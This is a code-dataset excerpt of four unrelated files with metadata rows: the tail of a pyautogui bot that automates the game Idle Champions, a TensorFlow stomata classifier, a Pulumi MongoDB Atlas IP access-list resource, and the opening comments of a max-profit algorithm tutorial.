elif level == 1 and not plus and log_restarted and args.charge_shandie > 0:
need_recharge = True
log_restarted = False
time.sleep(0.2)
pyautogui.press("g")
tracker.start_loop(now, level, plus)
print("Loop started %s: %d (charging shandie for %d seconds)" % (
datetime.datetime.now(), level, args.charge_shandie))
for i in range(0, 20):
pyautogui.press("f5")
for i in range(0, 20):
pyautogui.press("f6")
time.sleep(args.charge_shandie)
foreground_or_start()
if need_havi_ult:
need_havi_ult = False
print("Havi Ult")
pyautogui.press(args.havi_ult)
time.sleep(0.5)
pyautogui.press("g")
time.sleep(5.0)
elif level == 1 and need_leveling:
if log_restarted:
log_restarted = False
tracker.start_loop(now, level, plus)
print("Loop started %s: %d" % (datetime.datetime.now(), level))
# Manual leveling
level_team_with_keys(args, speed_team, between_champs=DEFAULT_DELAY)
need_leveling = False
need_recharge = True
elif level < 40 and need_havi_ult:
need_recharge = True
if log_restarted:
tracker.start_loop(now, level, plus)
log_restarted = False
if level >= 11:
need_havi_ult = False
print("Havi Ult")
for i in range(0,40):
pyautogui.press(args.havi_ult)
time.sleep(0.1)
time.sleep(1.0)
elif level < args.target - 50:
diff = args.target - level
if args.briv_boss:
# foreground_or_start()
debug_print("checking for team on_boss")
if plus and on_boss(fast=True):
verbose_print("team is on_boss")
pyautogui.press('e')
pyautogui.press('g')
while not zone_complete():
# print("zone uncomplete")
pass
pyautogui.press('q')
time.sleep(0.5)
pyautogui.press('g')
time.sleep(0.5)
pyautogui.press('q')
time.sleep(1.0)
if args.screenshare:
accept_screen_share(args.screenshare)
else:
time.sleep(diff*0.25)
foreground_or_start()
elif level < args.target - args.briv_recharge_areas:
verbose_print("continue at %d" % level)
continue
else:
verbose_print("check for recharge at %d" % level)
log_restarted = True
if need_recharge:
charge_briv(level, plus, level_images, args)
last_level = -1
last_level_time = datetime.datetime.now()
verbose_print("Recharge finished: %s" % last_level_time)
need_recharge = False
need_havi_ult = True
OFFSET_xx2 = 1925 - OFFSET_xx1
OFFSET_xx3 = 2025 - OFFSET_xx1
OFFSET_xx4 = 2122 - OFFSET_xx1
if args.command == "grab":
region = get_level_region()
raw_im = pyautogui.screenshot(region=region)
im = raw_im.convert('RGB')
im.save("1xx.png")
sys.exit(0)
x, y = menu_location()
pyautogui.moveTo(x, y)
x, y = location_for_screenshot(440, 240)
region = region_for_screenshot(350, 170, 565, 325)
im = pyautogui.screenshot(region=region)
im.save("inventory.png")
sys.exit(0)
level, plus = get_current_zone(level_images, args.save_mismatch)
# x, y = get_menu()
print("x = %f y = %f" % (x, y))
# x01
# x = menu_home.x * 2 + 1830
# y = menu_home.y * 2 + 10
im = pyautogui.screenshot(region=(x, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("1xx.png")
# x02
# x = menu_home.x * 2 + 1927
im = pyautogui.screenshot(region=(x+OFFSET_xx2, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("2xx.png")
# x03
# x = menu_home.x * 2 + 2025
im = pyautogui.screenshot(region=(x+OFFSET_xx3, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("3xx.png")
# x04
# x = menu_home.x * 2 + 2122
im = pyautogui.screenshot(region=(x+OFFSET_xx4, y, IMAGE_WIDTH, IMAGE_HEIGHT))
im.save("4xx.png")
# boss
# x = menu_home.x * 2 + 2219
# im = pyautogui.screenshot(region=(x, y, 56, 56))
# im.save("boss.png")
sys.exit(1)
while args.command == "monitor":
time.sleep(1.0)
menu_home = locate('menu.png')
print("menu_home.x = %f menu_home.y = %f" % (menu_home.x, menu_home.y))
x = menu_home.x * 2 + 1830
y = menu_home.y * 2 + 10
# Try grabbing a small section of screen
for i in range(0,300):
time.sleep(5)
im = pyautogui.screenshot(region=(x, y, IMAGE_WIDTH, IMAGE_HEIGHT))
# in list?
found = False
for name, img in level_images.items():
diff = ImageChops.difference(im.convert('RGB'), img).getbbox()
if not diff:
try:
level = int(name[7:10])
except Exception:
level = 0
print("Found %s again %s" % (name, level))
found = True
break
if found:
continue
print("Saving %i" % i)
im.save('my_screenshot%d.png' % i)
break
if args.command == "move":
x = args.loops
y = args.extras[0]
found_app = activate_app(APP_NAME)
rect = found_app._rect
print("app=%s" % str(found_app))
sys.exit(0)
# click_second_spec(delay=1.0)
while args.command == "press":
keys = ["q", "w", "e"]
print("Pressing %s" % keys[args.loops-1])
pyautogui.press(keys[args.loops-1])
time.sleep(10)
# click_second_spec(delay=1.0)
while args.command == "buy":
found = click_image("1chest.png", "1chestH.png", delay=0.5)
time.sleep(0.25)
while found:
pyautogui.moveRel(900, 0, duration=0.0)
time.sleep(0.25)
pyautogui.click()
loops += 1
if loops >= args.loops:
break
time.sleep(2.5)
pyautogui.moveRel(-900, 0, duration=0.0)
time.sleep(0.25)
pyautogui.click()
time.sleep(0.25)
if loops >= args.loops:
break
start_time = datetime.datetime.now()
do_startup = True
if args.in_progress:
do_startup = False
wait_minutes = 10 if args.loops == 0 else args.loops
while args.command in no_modron_commands:
infinite_loop = True
loop_time = datetime.datetime.now()
menu_home = None
ult = 0
loops += 1
if loops > args.runloops:
break
print("Starting loop %d at %s" % (loops, datetime.datetime.now()))
if do_startup:
# Startup by clicking on the Mad Wizard City
start_it_up(args.adventure)
for i in range(0, 20):
time.sleep(1.0)
blue, grey = check_for_menu()
if blue or grey:
break
# We are now on Level 1: Time to GO
# Drop Fams First
print("Dropping up to %d Familiars" % (args.familiars,))
time.sleep(DEFAULT_DELAY)
pyautogui.press('g')
time.sleep(DEFAULT_DELAY)
# Now we have formations!
# place_click_familiars(args.familiars)
pyautogui.press('q')
time.sleep(DEFAULT_DELAY)
# Level Champs
print("Leveling up Champs")
level_team_with_keys(args, speed_team, between_champs=DEFAULT_DELAY)
print("Running for %d minutes before checking for Briv Charging %s" % (args.loops, datetime.datetime.now()))
for m in range(wait_minutes, 0, -1):
print(" %d minutes" % m)
time.sleep(60.0)
do_startup = True
# check the level and charge Briv
# recharge Briv
if have_briv:
while True:
try:
time.sleep(10)
level, plus = get_current_zone(level_images, args.save_mismatch)
if level >= args.target:
charge_briv(level, plus, level_images, args)
break
except Exception as a:
print("Briv Charge Error: %s" % str(a))
pass
# shutdown the loop
print("Wrapping up starting at %s" % (datetime.datetime.now()))
try:
wrap_it_up()
except Exception as a:
print("Wrap Up Error: %s" % str(a))
pass
# dump some stats
run_time = datetime.datetime.now() - start_time
loop_time = datetime.datetime.now() - loop_time
print("Loops: %d Runtime: %s This Loop: %s Average Loop: %s Crashes: %d" % (
loops,
run_time,
loop_time,
run_time / float(loops),
crashes)
)
# print("%s" % list(pyautogui.locateAllOnScreen('./burger2.png')))
if __name__ == "__main__":
first_loop = True
while first_loop or infinite_loop:
try:
main_method()
except Exception as e:
print("WARNING: exception caught: %s" % e)
time.sleep(5.0)
| 36.048294 | 228 | 0.561127 |
0360303a8119a78eb7122982d841db4e8be17832 | 4,023 | py | Python | deepstomata/stomata_model.py | totti0223/deepstomata | e4f5dd5d1a65232ed13f6bea6f4d1f02d1494558 | [
"MIT"
] | 5 | 2018-07-10T00:59:59.000Z | 2021-07-02T02:39:33.000Z | deepstomata/stomata_model.py | totti0223/deepstomata | e4f5dd5d1a65232ed13f6bea6f4d1f02d1494558 | [
"MIT"
] | null | null | null | deepstomata/stomata_model.py | totti0223/deepstomata | e4f5dd5d1a65232ed13f6bea6f4d1f02d1494558 | [
"MIT"
] | 3 | 2018-12-21T20:42:02.000Z | 2019-11-02T10:26:37.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
from math import sqrt
MOVING_AVERAGE_DECAY = 0.9999
def tf_inference(images, BATCH_SIZE, image_size, NUM_CLASSES):
def _variable_with_weight_decay(name, shape, stddev, wd):
var = tf.get_variable(name, shape=shape, initializer=tf.truncated_normal_initializer(stddev=stddev))
if wd:
weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def _activation_summary(x):
tensor_name = x.op.name
tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
with tf.variable_scope('conv1') as scope:
kernel = tf.get_variable('weights', shape=[3, 3, 3, 32], initializer=tf.truncated_normal_initializer(stddev=0.1))
conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', shape=[32], initializer=tf.constant_initializer(0.0))
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias, name=scope.name)
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
with tf.variable_scope('conv2') as scope:
kernel = tf.get_variable('weights', shape=[3, 3, 32, 64], initializer=tf.truncated_normal_initializer(stddev=0.1))
conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', shape=[64], initializer=tf.constant_initializer(0.0))
bias = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(bias, name=scope.name)
pool2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
with tf.variable_scope('conv3') as scope:
kernel = tf.get_variable('weights', shape=[3, 3, 64, 128], initializer=tf.truncated_normal_initializer(stddev=0.1))
conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', shape=[128], initializer=tf.constant_initializer(0.0))
bias = tf.nn.bias_add(conv, biases)
conv3 = tf.nn.relu(bias, name=scope.name)
pool3 = tf.nn.max_pool(conv3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool3')
with tf.variable_scope('conv4') as scope:
kernel = tf.get_variable('weights', shape=[3, 3, 128, 256], initializer=tf.truncated_normal_initializer(stddev=0.1))
conv = tf.nn.conv2d(pool3, kernel, [1, 1, 1, 1], padding='SAME')
biases = tf.get_variable('biases', shape=[256], initializer=tf.constant_initializer(0.0))
bias = tf.nn.bias_add(conv, biases)
conv4 = tf.nn.relu(bias, name=scope.name)
pool4 = tf.nn.max_pool(conv4, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool4')
with tf.variable_scope('fc5') as scope:
dim = 1
for d in pool4.get_shape()[1:].as_list():
dim *= d
reshape = tf.reshape(pool4, [BATCH_SIZE, dim])
weights = _variable_with_weight_decay('weights', shape=[dim, 1024], stddev=0.02, wd=0.005)
biases = tf.get_variable('biases', shape=[1024], initializer=tf.constant_initializer(0.0))
fc5 = tf.nn.relu(tf.nn.bias_add(tf.matmul(reshape, weights), biases), name=scope.name)
with tf.variable_scope('fc6') as scope:
weights = _variable_with_weight_decay('weights', shape=[1024, 256], stddev=0.02, wd=0.005)
biases = tf.get_variable('biases', shape=[256], initializer=tf.constant_initializer(0.0))
fc6 = tf.nn.relu(tf.nn.bias_add(tf.matmul(fc5, weights), biases), name=scope.name)
with tf.variable_scope('fc7') as scope:
weights = tf.get_variable('weights', shape=[256, NUM_CLASSES], initializer=tf.truncated_normal_initializer(stddev=0.02))
biases = tf.get_variable('biases', shape=[NUM_CLASSES], initializer=tf.constant_initializer(0.0))
fc7 = tf.nn.bias_add(tf.matmul(fc6, weights), biases, name=scope.name)
return fc7 | 55.109589 | 128 | 0.656724 |
82186ff702d7becb45fe10117bb47a0cfd5ddb64 | 22,737 | py | Python | sdk/python/pulumi_mongodbatlas/project_ip_access_list.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2020-04-28T19:12:30.000Z | 2022-03-22T23:04:46.000Z | sdk/python/pulumi_mongodbatlas/project_ip_access_list.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 59 | 2020-06-12T12:12:52.000Z | 2022-03-28T18:14:50.000Z | sdk/python/pulumi_mongodbatlas/project_ip_access_list.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-25T21:22:08.000Z | 2021-08-30T20:06:18.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ProjectIpAccessListArgs', 'ProjectIpAccessList']
@pulumi.input_type
class ProjectIpAccessListArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
aws_security_group: Optional[pulumi.Input[str]] = None,
cidr_block: Optional[pulumi.Input[str]] = None,
comment: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ProjectIpAccessList resource.
:param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
:param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] comment: Comment to add to the access list entry.
:param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
"""
pulumi.set(__self__, "project_id", project_id)
if aws_security_group is not None:
pulumi.set(__self__, "aws_security_group", aws_security_group)
if cidr_block is not None:
pulumi.set(__self__, "cidr_block", cidr_block)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
Unique identifier for the project to which you want to add one or more access list entries.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="awsSecurityGroup")
def aws_security_group(self) -> Optional[pulumi.Input[str]]:
"""
Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
"""
return pulumi.get(self, "aws_security_group")
@aws_security_group.setter
def aws_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "aws_security_group", value)
@property
@pulumi.getter(name="cidrBlock")
def cidr_block(self) -> Optional[pulumi.Input[str]]:
"""
Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
"""
return pulumi.get(self, "cidr_block")
@cidr_block.setter
def cidr_block(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cidr_block", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Comment to add to the access list entry.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@pulumi.input_type
class _ProjectIpAccessListState:
def __init__(__self__, *,
aws_security_group: Optional[pulumi.Input[str]] = None,
cidr_block: Optional[pulumi.Input[str]] = None,
comment: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ProjectIpAccessList resources.
:param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] comment: Comment to add to the access list entry.
:param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
:param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
"""
if aws_security_group is not None:
pulumi.set(__self__, "aws_security_group", aws_security_group)
if cidr_block is not None:
pulumi.set(__self__, "cidr_block", cidr_block)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
@property
@pulumi.getter(name="awsSecurityGroup")
def aws_security_group(self) -> Optional[pulumi.Input[str]]:
"""
Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
"""
return pulumi.get(self, "aws_security_group")
@aws_security_group.setter
def aws_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "aws_security_group", value)
@property
@pulumi.getter(name="cidrBlock")
def cidr_block(self) -> Optional[pulumi.Input[str]]:
"""
Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
"""
return pulumi.get(self, "cidr_block")
@cidr_block.setter
def cidr_block(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cidr_block", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Comment to add to the access list entry.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
Unique identifier for the project to which you want to add one or more access list entries.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
class ProjectIpAccessList(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_security_group: Optional[pulumi.Input[str]] = None,
cidr_block: Optional[pulumi.Input[str]] = None,
comment: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
`ProjectIpAccessList` provides an IP Access List entry resource. The access list grants access from IPs, CIDRs or AWS Security Groups (if VPC Peering is enabled) to clusters within the Project.
> **NOTE:** Groups and projects are synonymous terms. You may find `groupId` in the official documentation.
> **IMPORTANT:**
When you remove an entry from the access list, existing connections from the removed address(es) may remain open for a variable amount of time. How much time passes before Atlas closes the connection depends on several factors, including how the connection was established, the particular behavior of the application or driver using the address, and the connection protocol (e.g., TCP or UDP). This is particularly important to consider when changing an existing IP address or CIDR block as they cannot be updated via the Provider (comments can however), hence a change will force the destruction and recreation of entries.
## Example Usage
### Using CIDR Block
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.ProjectIpAccessList("test",
cidr_block="1.2.3.4/32",
comment="cidr block for tf acc testing",
project_id="<PROJECT-ID>")
```
### Using IP Address
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.ProjectIpAccessList("test",
comment="ip address for tf acc testing",
ip_address="2.3.4.5",
project_id="<PROJECT-ID>")
```
### Using an AWS Security Group
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test_network_container = mongodbatlas.NetworkContainer("testNetworkContainer",
project_id="<PROJECT-ID>",
atlas_cidr_block="192.168.208.0/21",
provider_name="AWS",
region_name="US_EAST_1")
test_network_peering = mongodbatlas.NetworkPeering("testNetworkPeering",
project_id="<PROJECT-ID>",
container_id=test_network_container.container_id,
accepter_region_name="us-east-1",
provider_name="AWS",
route_table_cidr_block="172.31.0.0/16",
vpc_id="vpc-0d93d6f69f1578bd8",
aws_account_id="232589400519")
test_project_ip_access_list = mongodbatlas.ProjectIpAccessList("testProjectIpAccessList",
project_id="<PROJECT-ID>",
aws_security_group="sg-0026348ec11780bd1",
comment="TestAcc for awsSecurityGroup",
opts=pulumi.ResourceOptions(depends_on=["mongodbatlas_network_peering.test"]))
```
> **IMPORTANT:** In order to use AWS Security Group(s) VPC Peering must be enabled like above example.
## Import
IP Access List entries can be imported using the `project_id` and `cidr_block` or `ip_address`, e.g.
```sh
$ pulumi import mongodbatlas:index/projectIpAccessList:ProjectIpAccessList test 5d0f1f74cf09a29120e123cd-10.242.88.0/21
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/access-lists/)
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] comment: Comment to add to the access list entry.
:param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
:param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProjectIpAccessListArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`ProjectIpAccessList` provides an IP Access List entry resource. The access list grants access from IPs, CIDRs or AWS Security Groups (if VPC Peering is enabled) to clusters within the Project.
> **NOTE:** Groups and projects are synonymous terms. You may find `groupId` in the official documentation.
> **IMPORTANT:**
When you remove an entry from the access list, existing connections from the removed address(es) may remain open for a variable amount of time. How much time passes before Atlas closes the connection depends on several factors, including how the connection was established, the particular behavior of the application or driver using the address, and the connection protocol (e.g., TCP or UDP). This is particularly important to consider when changing an existing IP address or CIDR block as they cannot be updated via the Provider (comments can however), hence a change will force the destruction and recreation of entries.
## Example Usage
### Using CIDR Block
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.ProjectIpAccessList("test",
cidr_block="1.2.3.4/32",
comment="cidr block for tf acc testing",
project_id="<PROJECT-ID>")
```
### Using IP Address
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.ProjectIpAccessList("test",
comment="ip address for tf acc testing",
ip_address="2.3.4.5",
project_id="<PROJECT-ID>")
```
### Using an AWS Security Group
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test_network_container = mongodbatlas.NetworkContainer("testNetworkContainer",
project_id="<PROJECT-ID>",
atlas_cidr_block="192.168.208.0/21",
provider_name="AWS",
region_name="US_EAST_1")
test_network_peering = mongodbatlas.NetworkPeering("testNetworkPeering",
project_id="<PROJECT-ID>",
container_id=test_network_container.container_id,
accepter_region_name="us-east-1",
provider_name="AWS",
route_table_cidr_block="172.31.0.0/16",
vpc_id="vpc-0d93d6f69f1578bd8",
aws_account_id="232589400519")
test_project_ip_access_list = mongodbatlas.ProjectIpAccessList("testProjectIpAccessList",
project_id="<PROJECT-ID>",
aws_security_group="sg-0026348ec11780bd1",
comment="TestAcc for awsSecurityGroup",
opts=pulumi.ResourceOptions(depends_on=["mongodbatlas_network_peering.test"]))
```
> **IMPORTANT:** In order to use AWS Security Group(s) VPC Peering must be enabled like above example.
## Import
IP Access List entries can be imported using the `project_id` and `cidr_block` or `ip_address`, e.g.
```sh
$ pulumi import mongodbatlas:index/projectIpAccessList:ProjectIpAccessList test 5d0f1f74cf09a29120e123cd-10.242.88.0/21
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/access-lists/)
:param str resource_name: The name of the resource.
:param ProjectIpAccessListArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProjectIpAccessListArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
aws_security_group: Optional[pulumi.Input[str]] = None,
cidr_block: Optional[pulumi.Input[str]] = None,
comment: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProjectIpAccessListArgs.__new__(ProjectIpAccessListArgs)
__props__.__dict__["aws_security_group"] = aws_security_group
__props__.__dict__["cidr_block"] = cidr_block
__props__.__dict__["comment"] = comment
__props__.__dict__["ip_address"] = ip_address
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
super(ProjectIpAccessList, __self__).__init__(
'mongodbatlas:index/projectIpAccessList:ProjectIpAccessList',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
aws_security_group: Optional[pulumi.Input[str]] = None,
cidr_block: Optional[pulumi.Input[str]] = None,
comment: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None) -> 'ProjectIpAccessList':
"""
Get an existing ProjectIpAccessList resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
:param pulumi.Input[str] comment: Comment to add to the access list entry.
:param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
:param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProjectIpAccessListState.__new__(_ProjectIpAccessListState)
__props__.__dict__["aws_security_group"] = aws_security_group
__props__.__dict__["cidr_block"] = cidr_block
__props__.__dict__["comment"] = comment
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["project_id"] = project_id
return ProjectIpAccessList(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="awsSecurityGroup")
def aws_security_group(self) -> pulumi.Output[str]:
"""
Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
"""
return pulumi.get(self, "aws_security_group")
@property
@pulumi.getter(name="cidrBlock")
def cidr_block(self) -> pulumi.Output[str]:
"""
Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
"""
return pulumi.get(self, "cidr_block")
@property
@pulumi.getter
def comment(self) -> pulumi.Output[str]:
"""
Comment to add to the access list entry.
"""
return pulumi.get(self, "comment")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[str]:
"""
Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
Unique identifier for the project to which you want to add one or more access list entries.
"""
return pulumi.get(self, "project_id")
| 49.107991 | 631 | 0.664951 |
066375348ff647f477e0db433ee4238d08535f82 | 14,770 | py | Python | algorithm_and_data_structure/easy_problems/max_profit_tutorial.py | elyor0529/Awesome-Full-Stack-Web-Developer | d7c8a48ba809832270f2061f6872df7b8550699d | [
"MIT"
] | 12 | 2017-11-15T12:48:06.000Z | 2021-12-28T02:28:24.000Z | algorithm_and_data_structure/easy_problems/max_profit_tutorial.py | Dmdv/Awesome-Full-Stack-Web-Developer | d7c8a48ba809832270f2061f6872df7b8550699d | [
"MIT"
] | null | null | null | algorithm_and_data_structure/easy_problems/max_profit_tutorial.py | Dmdv/Awesome-Full-Stack-Web-Developer | d7c8a48ba809832270f2061f6872df7b8550699d | [
"MIT"
] | 7 | 2017-07-14T15:38:32.000Z | 2022-03-25T19:53:08.000Z | # @Author: Keith Schwarz (htiek@cs.stanford.edu)
# @Date: Tue, 14th Mar 2017, T 14:43 +01:00
# @Email: me@anasaboureada.com
# @Project: awesome-full-stack-web-developer
# @Filename: max_profit_tutorial.py
# @Last modified by: anas
# @Last modified time: Tue, 14th Mar 2017, T 14:46 +01:00
# @License: MIT License
# @Copyright: Copyright (c) 2017 Anas Aboureada <anasaboureada.com>
# Four different algorithms for solving the maximum single-sell profit problem,
# each of which have different time and space complexity. This is one of my
# all-time favorite algorithms questions, since there are so many different
